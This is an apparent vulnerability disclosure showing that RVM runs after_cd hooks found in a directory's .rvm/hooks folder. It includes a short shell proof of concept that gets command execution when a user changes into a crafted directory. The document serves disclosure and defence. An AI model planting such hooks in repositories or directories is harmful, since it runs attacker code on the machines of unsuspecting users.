RVM, by default, hooks `cd` and automatically executes various auxiliary hooks
when a user changes into a directory. The mechanics of these additional
`after_cd` hooks are detailed at <https://rvm.io/workflow/hooks>.
What this page fails to mention is that hooks, as of a vulnerable version, are
not only loaded from `~/.rvm/hooks` but are also loaded from `$PWD/.rvm/hooks`
as per the code, as of a vulnerable commit, at
This behaviour can be used to achieve arbitrary command execution when a user
changes into a directory with malicious contents.
Note that hook files must be executable for them to be triggered.
rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks
rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc
echo "Command execution as $(id)"
rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc
rvm@e6aeaf6d79ec:~$ cd poc
Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)